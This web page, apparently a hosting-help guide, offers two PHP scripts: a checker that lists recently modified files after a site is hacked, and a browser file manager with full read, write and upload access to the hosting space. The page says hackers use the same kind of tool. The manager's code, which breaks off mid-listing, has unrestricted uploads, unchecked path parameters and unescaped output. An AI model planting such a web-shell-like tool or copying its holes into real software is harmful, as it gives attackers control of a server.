						Put this script in your hosting in the folder “www” or “public_html”, open it with your web browser, enter the number of days representing the period to be checked, then the name of the folder to be scanned. The file path must end with / as for example “/forum/” which will correspond to “/home/yourloginftp/www/forum/”.<br>
						If you want to check the entire contents of the “www” or “public_html” folder, just click on the “Check Files” button.</p>
						<p>Be careful, if you have a lot of files and directories, the listing may take too much time to complete and the script may stop after 30 seconds of execution. If this is the case, try to search directory by directory.</p>
						<p>This script will only list folders from the path “/home/yourloginftp/www/” or “/home/yourloginftp/public_html/” of your hosting. Once the operation is completed, delete this file to avoid any unintended use.</p>
						<p>You can get this PHP file here: <a href="depot/modif-en.zip">modif-en.zip (2.1 KB)</a></p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;height:40em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #BC7A00">&lt;?php</span>
<span style="color: #408080; font-style: italic">/*</span>
<span style="color: #408080; font-style: italic">Lists the last files created AND modified.</span>
<span style="color: #408080; font-style: italic">Very useful in case of hacking to know which files are added and which have been modified. Useful to understand the behaviour of a script or CMS and see which files have been manipulated.</span>

<span style="color: #408080; font-style: italic">Save this script in your hosting, open it with your web browser, give the number of days representing the period to be checked, then the name of the folder to be scanned.</span>
<span style="color: #408080; font-style: italic">This script will only list folders from the path /home/yourloginftp/www/ of your hosting.</span>

<span style="color: #408080; font-style: italic">Delete the file after use.</span>

<span style="color: #408080; font-style: italic">Credits: 4/5 of the code is the work of Linda MacPhee-Cobb (http://timestocome.com)</span>
<span style="color: #408080; font-style: italic">*/</span>
    <span style="color: #19177C">$go_back</span> <span style="color: #666666">=</span> <span style="color: #666666">0</span>;                       <span style="color: #408080; font-style: italic">/* display result or not */</span>
    <span style="color: #19177C">$i</span> <span style="color: #666666">=</span> <span style="color: #666666">0</span>;                                <span style="color: #408080; font-style: italic">/* loop counter */</span>
    <span style="color: #19177C">$dir_count</span> <span style="color: #666666">=</span> <span style="color: #666666">0</span>;                        <span style="color: #408080; font-style: italic">/* loop initialisation */</span>
    <span style="color: #19177C">$date</span> <span style="color: #666666">=</span> <span style="color: #008000">time</span>();                        <span style="color: #408080; font-style: italic">/* current date and time */</span>
    <span style="color: #19177C">$one_day</span> <span style="color: #666666">=</span> <span style="color: #666666">86400</span>;                    <span style="color: #408080; font-style: italic">/* number of seconds for a day */</span>
    <span style="color: #19177C">$days</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&#39;~[^0-9]~i&#39;</span>,<span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;jours&quot;</span>]);    <span style="color: #408080; font-style: italic">/* number of days to check */</span>
    <span style="color: #19177C">$path</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&#39;~[^_A-Za-z0-9-\.%\/]~i&#39;</span>,<span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;chemin&quot;</span>]);    <span style="color: #408080; font-style: italic">/* absolute file path (with cleanup against hacking) */</span>
    <span style="color: #19177C">$path</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&quot;/\.\.\//&quot;</span>,<span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$path</span>);    <span style="color: #408080; font-style: italic">/* you forbid the command ../ */</span>
    <span style="color: #008000">define</span>(<span style="color: #BA2121">&#39;ABSPATH&#39;</span>, <span style="color: #008000">dirname</span>(<span style="color: #008000; font-weight: bold">__FILE__</span>));
    <span style="color: #19177C">$path</span> <span style="color: #666666">=</span> ABSPATH<span style="color: #666666">.</span><span style="color: #19177C">$path</span>;    <span style="color: #408080; font-style: italic">/* absolute file path of your account such as /home/loginftp/www/ or /home/loginftp/public_html/ etc. */</span>
    <span style="color: #19177C">$directories_to_read</span>[<span style="color: #19177C">$dir_count</span>] <span style="color: #666666">=</span> <span style="color: #19177C">$path</span>;
    
    <span style="color: #408080; font-style: italic">/* Form to go back in time */</span>
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;html&gt;&lt;body&gt;&lt;h3&gt;Checking the last modified files &lt;br /&gt; in your hosting.&lt;/h3&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;table&gt;&lt;tr&gt;&lt;td&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;form method=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">post</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt;Number of days to check 1-99: &lt;/td&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">text</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">jours</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> maxlength=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">2</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> size=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">2</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&lt;/td&gt;&lt;/tr&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt;Name of the directory to check: &lt;/td&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;td&gt;&quot;</span><span style="color: #666666">.</span>ABSPATH<span style="color: #666666">.</span><span style="color: #BA2121">&quot; &lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">text</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">chemin</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> maxlength=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">80</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> size=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">30</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">/</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> &gt; (put a / at the end)&lt;/td&gt;&lt;/tr&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt; &lt;/td&gt;&lt;td&gt;&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">submit</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> Check Files </span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;/form&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&quot;</span>;
    <span style="color: #408080; font-style: italic">/* Result display */</span>
    <span style="color: #19177C">$go_back</span> <span style="color: #666666">=</span> <span style="color: #19177C">$one_day</span> <span style="color: #666666">*</span> <span style="color: #19177C">$days</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;br /&gt; Back to the &lt;strong&gt;&quot;</span> <span style="color: #666666">.</span> (<span style="color: #19177C">$go_back</span><span style="color: #666666">/</span><span style="color: #19177C">$one_day</span>) <span style="color: #666666">.</span><span style="color: #BA2121">&quot;&lt;/strong&gt; last days. &lt;br /&gt;&lt;br /&gt;&quot;</span>;

    <span style="color: #008000; font-weight: bold">if</span> ( <span style="color: #19177C">$go_back</span> <span style="color: #666666">&gt;</span> <span style="color: #666666">0</span> ){
        <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;table&gt;&lt;tr&gt;&lt;th&gt;File Name&lt;/th&gt;&lt;th&gt;Modification Date&lt;/th&gt;&lt;/tr&gt;&quot;</span>;
        <span style="color: #19177C">$diff</span> <span style="color: #666666">=</span> <span style="color: #19177C">$date</span> <span style="color: #666666">-</span> <span style="color: #19177C">$go_back</span>;
        
        <span style="color: #008000; font-weight: bold">while</span> ( <span style="color: #19177C">$i</span> <span style="color: #666666">&lt;=</span> <span style="color: #19177C">$dir_count</span> ){
            <span style="color: #19177C">$current_directory</span> <span style="color: #666666">=</span> <span style="color: #19177C">$directories_to_read</span>[<span style="color: #19177C">$i</span>];
        
            <span style="color: #408080; font-style: italic">/* get file information */</span>
            <span style="color: #19177C">$read_path</span> <span style="color: #666666">=</span> <span style="color: #008000">opendir</span>( <span style="color: #19177C">$directories_to_read</span>[<span style="color: #19177C">$i</span>] );
            <span style="color: #008000; font-weight: bold">while</span> ( <span style="color: #19177C">$file_name</span> <span style="color: #666666">=</span> <span style="color: #008000">readdir</span>( <span style="color: #19177C">$read_path</span>)){
                <span style="color: #008000; font-weight: bold">if</span> (( <span style="color: #19177C">$file_name</span> <span style="color: #666666">!=</span> <span style="color: #BA2121">&#39;.&#39;</span> )<span style="color: #666666">&amp;&amp;</span>( <span style="color: #19177C">$file_name</span> <span style="color: #666666">!=</span> <span style="color: #BA2121">&#39;..&#39;</span> )){
                    <span style="color: #008000; font-weight: bold">if</span> ( <span style="color: #008000">is_dir</span>( <span style="color: #19177C">$current_directory</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&quot;/&quot;</span>  <span style="color: #666666">.</span> <span style="color: #19177C">$file_name</span> ) ){
                        <span style="color: #408080; font-style: italic">/* need to get all the files in a directory */</span>
                        <span style="color: #19177C">$d_file_name</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$current_directory</span><span style="color: #BA2121">&quot;</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$file_name</span><span style="color: #BA2121">&quot;</span>;
                        <span style="color: #19177C">$dir_count</span><span style="color: #666666">++</span>;
                        <span style="color: #19177C">$directories_to_read</span>[<span style="color: #19177C">$dir_count</span>] <span style="color: #666666">=</span> <span style="color: #19177C">$d_file_name</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&quot;/&quot;</span>;
                    }<span style="color: #008000; font-weight: bold">else</span>{
                        <span style="color: #19177C">$file_name</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$current_directory</span><span style="color: #BA2121">&quot;</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$file_name</span><span style="color: #BA2121">&quot;</span>;                                
                        <span style="color: #408080; font-style: italic">/* If modified times more recent than x days, display, otherwise, pass */</span>
                        <span style="color: #008000; font-weight: bold">if</span> ( (@<span style="color: #008000">filemtime</span>( <span style="color: #19177C">$file_name</span>)) <span style="color: #666666">&gt;</span> <span style="color: #19177C">$diff</span>  ){
                            <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt; </span><span style="color: #BB6688; font-weight: bold">$file_name</span><span style="color: #BA2121"> &lt;/td&gt;&quot;</span>;
                            <span style="color: #19177C">$date_changed</span> <span style="color: #666666">=</span> <span style="color: #008000">filemtime</span>( <span style="color: #19177C">$file_name</span> );
                            <span style="color: #19177C">$pretty_date</span> <span style="color: #666666">=</span> <span style="color: #008000">date</span>(<span style="color: #BA2121">&quot;d/m/Y H:i:s&quot;</span>, <span style="color: #19177C">$date_changed</span>);
                            <span style="color: #008000; font-weight: bold">print</span>  <span style="color: #BA2121">&quot;&lt;td&gt; ::: </span><span style="color: #BB6688; font-weight: bold">$pretty_date</span><span style="color: #BA2121">&lt;/td&gt;&lt;/tr&gt;&quot;</span> ;
                        }
                    }
                }
            }
            @<span style="color: #008000">closedir</span> ( <span style="color: #19177C">$read_path</span> );
            <span style="color: #19177C">$i</span><span style="color: #666666">++</span>;    
        }
            <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;/table&gt;&quot;</span>;    
            <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;br /&gt;Delete the file after use.&lt;/body&gt;&lt;/html&gt;&quot;</span>;    
    } <span style="color: #408080; font-style: italic">/* if go_back &gt; 0 ) */</span>
<span style="color: #BC7A00">?&gt;</span>
</pre></div>

						<a id="gesfic"></a><hr><br>
						<header>
							<h2>File manager to control your web space</h2>
						</header>
						<p>This file manager written in PHP allows you to manipulate the content of a web space, as you would do by FTP. You can create, read, delete, compress, decompress, change rights, rename files and folders. Its interface is simplistic but efficient.</p>
						<p>It is with this kind of script that the hacker modifies your site when he succeeds in exploiting a security flaw by sending his file to your hosting.</p>
						<p>Copy the code below and create a text file that you can call for example gesfic.php<br>
						Put this script in your hosting in the folder “www” or “public_html” or elsewhere, and open it with your web browser.</p>
						<p>The manager gives read and write access to all the space of your hosting. Once the operation is completed, delete this file to avoid any unintended use.</p>
						<p>You can get this PHP file here: <a href="depot/gesfic-en.zip">gesfic-en.zip (4.3 KB)</a></p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;height:40em;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #BC7A00">&lt;?php</span>
<span style="color: #408080; font-style: italic">/* ############################# */</span>
<span style="color: #408080; font-style: italic">/* File Manager */</span>
<span style="color: #408080; font-style: italic">/* TO BE DELETED AFTER USE */</span>
<span style="color: #408080; font-style: italic">/* ############################# */</span>
<span style="color: #408080; font-style: italic">/* Add, modify files and folders in a directory */</span>
<span style="color: #408080; font-style: italic">/* ############################# */</span>

<span style="color: #008000">set_time_limit</span>(<span style="color: #666666">0</span>);
<span style="color: #008000">error_reporting</span>(<span style="color: #666666">0</span>);

<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;!DOCTYPE HTML&gt;</span>
<span style="color: #BA2121">&lt;html&gt;</span>
<span style="color: #BA2121">&lt;head&gt;</span>
<span style="color: #BA2121">&lt;style&gt;</span>
<span style="color: #BA2121">body {font-family: monospace;background-color: #ffffff;}</span>
<span style="color: #BA2121">.petit {font-size:.8em;}</span>
<span style="color: #BA2121">#content tr:hover {background-color: #008580;text-shadow:0px 0px 10px #ffffff;}</span>
<span style="color: #BA2121">#content .first {background-color: #008580;}</span>
<span style="color: #BA2121">#content .first:hover {background-color: #008580;text-shadow:0px 0px 1px #ffffff;}</span>
<span style="color: #BA2121">table {border: 1px #008580 dotted;}</span>
<span style="color: #BA2121">a {color: mediumblue;text-decoration: none;}</span>
<span style="color: #BA2121">a:hover {color: #fff;text-shadow:0px 0px 10px #ffffff;}</span>
<span style="color: #BA2121">input,select,textarea {border: 1px #000000 solid;border-radius:5px;}</span>
<span style="color: #BA2121">.milieu {display: block;margin:0 auto;}</span>
<span style="color: #BA2121">.centre {text-align:center;}</span>
<span style="color: #BA2121">&lt;/style&gt;</span>
<span style="color: #BA2121">&lt;/head&gt;</span>
<span style="color: #BA2121">&lt;body&gt;</span>
<span style="color: #BA2121">&lt;table width=&quot;700&quot; border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;1&quot; align=&quot;center&quot;&gt;</span>
<span style="color: #BA2121">&lt;tr&gt;&lt;td&gt;File path &gt;&gt;  &#39;</span>;
<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;path&#39;</span>])) {
	<span style="color: #19177C">$path</span> <span style="color: #666666">=</span> <span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;path&#39;</span>];
}
<span style="color: #008000; font-weight: bold">else</span> {
	<span style="color: #19177C">$path</span> <span style="color: #666666">=</span> <span style="color: #008000">getcwd</span>();
}
<span style="color: #19177C">$path</span> <span style="color: #666666">=</span> <span style="color: #008000">str_replace</span>(<span style="color: #BA2121">&#39;\\&#39;</span>, <span style="color: #BA2121">&#39;/&#39;</span>, <span style="color: #19177C">$path</span>);
<span style="color: #19177C">$paths</span> <span style="color: #666666">=</span> <span style="color: #008000">explode</span>(<span style="color: #BA2121">&#39;/&#39;</span>, <span style="color: #19177C">$path</span>);

<span style="color: #008000; font-weight: bold">foreach</span> (<span style="color: #19177C">$paths</span> <span style="color: #008000; font-weight: bold">as</span> <span style="color: #19177C">$id</span> <span style="color: #666666">=&gt;</span> <span style="color: #19177C">$pat</span>) {
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$pat</span> <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;&#39;</span> <span style="color: #666666">&amp;&amp;</span> <span style="color: #19177C">$id</span> <span style="color: #666666">==</span> <span style="color: #666666">0</span>) {
		<span style="color: #19177C">$a</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">true</span>;
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;a href=&quot;?path=/&quot;&gt;/&lt;/a&gt;&#39;</span>;
		<span style="color: #008000; font-weight: bold">continue</span>;
	}
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$pat</span> <span style="color: #666666">==</span> <span style="color: #BA2121">&#39;&#39;</span>) <span style="color: #008000; font-weight: bold">continue</span>;
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;a href=&quot;?path=&#39;</span>;
	<span style="color: #008000; font-weight: bold">for</span> (<span style="color: #19177C">$i</span> <span style="color: #666666">=</span> <span style="color: #666666">0</span>;<span style="color: #19177C">$i</span> <span style="color: #666666">&lt;=</span> <span style="color: #19177C">$id</span>;<span style="color: #19177C">$i</span><span style="color: #666666">++</span>) {
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;</span><span style="color: #BB6688; font-weight: bold">$paths[$i]</span><span style="color: #BA2121">&quot;</span>;
		<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$i</span> <span style="color: #666666">!=</span> <span style="color: #19177C">$id</span>) <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;/&quot;</span>;
	}
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&quot;&gt;&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$pat</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;&lt;/a&gt;/&#39;</span>;
}
<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&#39;</span>;
<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_FILES</span>[<span style="color: #BA2121">&#39;file&#39;</span>])) {
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">copy</span>(<span style="color: #19177C">$_FILES</span>[<span style="color: #BA2121">&#39;file&#39;</span>][<span style="color: #BA2121">&#39;tmp_name&#39;</span>], <span style="color: #19177C">$path</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;/&#39;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$_FILES</span>[<span style="color: #BA2121">&#39;file&#39;</span>][<span style="color: #BA2121">&#39;name&#39;</span>])) {
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Upload successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">else</span> {
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Upoload failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
	}
}
<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;form enctype=&quot;multipart/form-data&quot; method=&quot;POST&quot;&gt;</span>
<span style="color: #BA2121">Upload a file &lt;input type=&quot;file&quot; name=&quot;file&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;submit&quot; value=&quot;Send&quot;&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;&#39;</span>;

<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;dossier&#39;</span>])) {
	<span style="color: #19177C">$nomDossier</span> <span style="color: #666666">=</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;dossier&#39;</span>];
	<span style="color: #19177C">$nomDossier</span> <span style="color: #666666">=</span> <span style="color: #008000">str_replace</span>(<span style="color: #BA2121">&#39; &#39;</span>, <span style="color: #BA2121">&#39;_&#39;</span>, <span style="color: #19177C">$nomDossier</span>);
	<span style="color: #19177C">$nomDossier</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&#39;/[^a-zA-Z0-9\/_-]/&#39;</span>, <span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$nomDossier</span>);
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">file_exists</span>(<span style="color: #19177C">$nomDossier</span>)) {
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Existing folder&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">mkdir</span>(<span style="color: #19177C">$nomDossier</span>, <span style="color: #666666">0755</span>)) {
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Adding folder successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">else</span> {
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Add folder failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
	}
}
<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;form method=&quot;POST&quot;&gt;</span>
<span style="color: #BA2121">Create a &lt;strong&gt;folder&lt;/strong&gt; with absolute path &lt;input type=&quot;text&quot; name=&quot;dossier&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> <span style="color: #008000">realpath</span>(<span style="color: #19177C">$path</span>) <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;/name-directory/&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;&#39;</span>;

<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;creafichier&#39;</span>])) {
	<span style="color: #19177C">$creaFichier</span> <span style="color: #666666">=</span> <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;creafichier&#39;</span>];
	<span style="color: #19177C">$creaFichier</span> <span style="color: #666666">=</span> <span style="color: #008000">str_replace</span>(<span style="color: #BA2121">&#39; &#39;</span>, <span style="color: #BA2121">&#39;_&#39;</span>, <span style="color: #19177C">$creaFichier</span>);
	<span style="color: #19177C">$creaFichier</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&#39;/[^a-zA-Z0-9\/\._-]/&#39;</span>, <span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$creaFichier</span>);
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">file_exists</span>(<span style="color: #19177C">$creaFichier</span>)) {
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Existing file&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #666666">!</span><span style="color: #008000">file_exists</span>(<span style="color: #19177C">$creaFichier</span>)) {
		<span style="color: #19177C">$anse</span> <span style="color: #666666">=</span> <span style="color: #008000">fopen</span>(<span style="color: #19177C">$creaFichier</span>,<span style="color: #BA2121">&#39;c+&#39;</span>); <span style="color: #19177C">$ducontenu</span><span style="color: #666666">=</span><span style="color: #BA2121">&#39;Sample content&#39;</span>; <span style="color: #008000">fwrite</span>(<span style="color: #19177C">$anse</span>,<span style="color: #19177C">$ducontenu</span>); <span style="color: #008000">fclose</span>(<span style="color: #19177C">$anse</span>);
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;green&quot;&gt;Adding file successful!&lt;/font&gt;&lt;br&gt;&#39;</span>;
	}
	<span style="color: #008000; font-weight: bold">else</span> {
		<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;font color=&quot;crimson&quot;&gt;&lt;strong&gt;Add file failed!&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;&#39;</span>;
	}
}
<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;form method=&quot;POST&quot;&gt;</span>
<span style="color: #BA2121">Create a &lt;em&gt;file&lt;/em&gt; with absolute path &lt;input type=&quot;text&quot; name=&quot;creafichier&quot; value=&quot;&#39;</span> <span style="color: #666666">.</span> <span style="color: #008000">realpath</span>(<span style="color: #19177C">$path</span>) <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;/file.txt&quot;&gt;</span>
<span style="color: #BA2121">&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;</span>
<span style="color: #BA2121">&lt;/form&gt;&#39;</span>;

<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;br&gt;&lt;br&gt;&#39;</span> <span style="color: #666666">.</span> <span style="color: #008000">php_uname</span>() <span style="color: #666666">.</span> <span style="color: #BA2121">&#39;</span>
<span style="color: #BA2121">&lt;/td&gt;&lt;/tr&gt;&#39;</span>;

<span style="color: #008000; font-weight: bold">if</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>]) <span style="color: #666666">&amp;&amp;</span> <span style="color: #008000">isset</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;telechargefichier&#39;</span>])) { telFichBin(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>]); }
<span style="color: #008000; font-weight: bold">elseif</span> (<span style="color: #008000">isset</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>])) {
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt;Files &gt;&gt; &quot;</span>;
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>];
	<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&#39;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;&#39;</span>;
	<span style="color: #19177C">$ext_fich</span> <span style="color: #666666">=</span> substr(<span style="color: #008000">strrchr</span>(<span style="color: #19177C">$_GET</span>[<span style="color: #BA2121">&#39;filesrc&#39;</span>],<span style="color: #BA2121">&#39;.&#39;</span>),<span style="color: #666666">1</span>);
	<span style="color: #19177C">$media_ext_liste</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">array</span>(<span style="color: #BA2121">&#39;jpg&#39;</span>,<span style="color: #BA2121">&#39;png&#39;</span>,<span style="color: #BA2121">&#39;gif&#39;</span>,<span style="color: #BA2121">&#39;ico&#39;</span>,<span style="color: #BA2121">&#39;pdf&#39;</span>,<span style="color: #BA2121">&#39;mp3&#39;</span>,<span style="color: #BA2121">&#39;wav&#39;</span>,<span style="color: #BA2121">&#39;webp&#39;</span>,<span style="color: #BA2121">&#39;heic&#39;</span>,<span style="color: #BA2121">&#39;heif&#39;</span>,<span style="color: #BA2121">&#39;mp4&#39;</span>,<span style="color: #BA2121">&#39;mov&#39;</span>,<span style="color: #BA2121">&#39;hevf&#39;</span>,<span style="color: #BA2121">&#39;av1&#39;</span>);
